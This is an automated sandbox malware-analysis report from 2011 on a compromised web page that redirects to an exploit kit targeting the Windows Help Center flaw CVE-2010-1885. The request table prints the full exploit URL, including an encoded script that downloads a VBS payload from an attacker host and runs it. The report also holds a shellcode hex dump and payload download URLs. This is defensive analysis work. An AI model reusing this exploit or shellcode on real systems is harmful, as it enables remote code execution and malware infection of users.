Analysis report for http://www.innovnet.com/images/rij72/

Sample Overview

URL http://www.innovnet.com/images/rij72/
Domainwww.innovnet.com
Analysis Started 2011-11-04 23:50:25
Report Generated 2011-11-05 04:34:46
Jsand version 2.3.0

See the report for domain www.innovnet.com.

Detection results

DetectorResult
Jsand 2.3.0 malicious

In particular, the following URL was found to contain malicious content:

Exploits

NameDescriptionReference
HPC URLHelp Center URL Validation VulnerabilityCVE-2010-1885

Deobfuscation results

Evals

Writes

Network Activity

Requests

URL StatusContent Type
http://www.innovnet.com/images/rij72/ 302text/html
http://lensesorganization.ru/contact/index.php 200text/html
http://deposit-consulting.ru/allow.php?page=19909cd93a1a78f6 200text/html
http://deposit-consulting.ru/content/field.jar 200application/zip
about:blank 200text/html
http://deposit-consulting.ru/content/2ddfp.php?f=130 200application/pdf
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,100,101,112,111,115,105,116,45,99,111,110,115,117,108,116,105,110,103,46,114,117,47,99,111,110,116,101,110,116,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,49,51,48,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script> 505text/plain
http://guide.opendns.com/main?q=Sorry,%20this%20page%20can%09%20be%20found 200text/html
http://files.opendns.com/guide/layouts/common/js/jquery-1.4.2.min.js 200text/javascript
http://guide.opendns.com/layouts/basic/js/guide.js?103 200text/javascript
http://d.yimg.com/mi/ywa.js 200application/javascript
http://a.analytics.yahoo.com/fpc.pl?a=10002134856462&v=5.19&enc=&b=OpenDNS&c=search&f=http%3A%2F%2Fguide.opendns.com%2Fmain%3Fq%3DSorry%2C%2520this%2520page%2520can%2509%2520be%2520found&x=INTERNAL_SEARCH&isk=Sorry%2C%20this%20page%20can%09%20be%20found&isr=659000000&cf2=1&cf5=0&cf15=0&flv=llweb.activex.GenericLoggingActiveX%403d5b89c&d=Sat%2C%2005%20Nov%202011%2011%3A34%3A44%20GMT&n=7&g=en-us&h=Y&j=1024x768&k=24&l=true&ittidx=0&fpc= 200application/x-javascript
http://guide.opendns.com/layouts/basic/css/opendns.css?v142 200text/css
http://edge.quantserve.com/quant.js 200application/x-javascript
http://pixel.quantserve.com/pixel;r=1229236514;fpan=1;fpa=P0-1320390810-1320492884930;ns=0;url=http%3A//guide.opendns.com/main%3Fq%3DSorry%2C%2520this%2520page%2520can%2509%2520be%2520found;ref=;ce=1;je=1;sr=1024x768x24;enc=s;ogl=;dst=1;et=1320492884929;tzo=420;a=p-e3W4hPas6QGaI;labels=basic.other 204empty
http://vlog.leadformix.com/bf/lfx.js 200application/javascript
http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/6878.js 200application/javascript

Redirects

FromTo
http://www.innovnet.com/images/rij72/http://lensesorganization.ru/contact/index.php

ActiveX controls

Shellcode

HexadecimalASCII
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 51 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  4c 4d 58 47 5b 41 5c 05 
4b 47 46 5b 5d 44 5c 41  46 4f 06 5a 5d 07 5f 06 
58 40 58 17 4e 15 19 1b  18 0e 4d 15 10 28 28 00 
AAAAf......X1.f.
.Q..0(@.........
..]..w..L.h..h$.
X4~.^...N.v.+\..
..=8....h..n..].
.....]y..dy~.]..
\.P+.~.^.+...ai.
.+...'.8..\...%+
.h...7].v.v.+.N.
$c.n..|.$..+..,.
+..vq..{..@..U$.
\+....@...B-q...
.....((((pxBh@.(
((x..1x}...v8..-
..@GF((@]ZDE|.>.
.....I....*.Z..,
)((.t.$.,.ZMO[.l
.,^Z...l....[.{@
.(((.~$....y.l5(
_XJ\.l5-.LDD.l5!
(q..,..l5,iyB(B(
{.B(.~<..]>B({.~
,B(..${.~,..$.*.
;o..(].o..(].B(B
..~.......f&....
&.G)....s3.nQ.2.
X@\\X...LMXG[A\.
KGF[]D\AFO.Z]._.
X@X.N.....M..((.

This shellcode was found on http://deposit-consulting.ru/allow.php?page=19909cd93a1a78f6.

Malware

Additional (potential) malware:

URLTypeHashAnalysis
http://deposit-consulting.ru/w.php?f=130&e=8 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 6c9ed041be9197c74c0ed5c41445c017
FEEDBACK

Comments